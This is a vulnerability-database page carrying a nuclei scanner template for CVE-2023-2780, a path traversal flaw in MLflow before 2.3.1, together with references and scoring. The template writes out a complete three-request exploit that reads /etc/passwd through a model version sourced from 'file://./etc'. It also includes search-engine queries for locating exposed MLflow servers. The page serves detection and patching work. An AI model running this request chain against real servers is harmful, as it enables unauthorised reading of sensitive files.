Lucene search
K

Mlflow <2.3.1 - Local File Inclusion Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

Mlflow <2.3.1 - Local File Inclusion Bypass, CVE-2023-2780, allows unauthorized access

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Local File Read Bypass in mlflow/mlflow
27 Mar 202311:20
huntr
Circl
CVE-2023-2780
18 May 202300:36
circl
CNNVD
Mlflow 安全漏洞
17 May 202300:00
cnnvd
CVE
CVE-2023-2780
17 May 202300:00
cve
Cvelist
CVE-2023-2780 Path Traversal: '\..\filename' in mlflow/mlflow
17 May 202300:00
cvelist
Github Security Blog
mlflow Path Traversal vulnerability
17 May 202321:30
github
NVD
CVE-2023-2780
17 May 202321:15
nvd
OSV
BIT-MLFLOW-2023-2780 Path Traversal: '\..\filename' in mlflow/mlflow
6 Mar 202410:58
osv
OSV
CVE-2023-2780 Path Traversal: '\..\filename' in mlflow/mlflow
17 May 202300:00
osv
OSV
GHSA-WJQ3-7JXX-WHJ9 mlflow Path Traversal vulnerability
17 May 202321:30
osv
Rows per page
id: CVE-2023-2780

info:
  name: Mlflow <2.3.1 - Local File Inclusion Bypass
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability.
  reference:
    - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2780
    - https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2780
    cwe-id: CWE-29
    epss-score: 0.06311
    epss-percentile: 0.92752
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"file://./etc"}
      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '"version": "([0-9.]+)",'
        internal: true
        part: body
# digest: 490a00463044022024119d50d83be27ffd73480f51788242a1728409e1047682ede9dfab9c48536b02200428f9059ec432a6c9244a36acf150044db32c363126c83ae586e4c6e9ee6793:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 39.8
EPSS0.06311
SSVC
42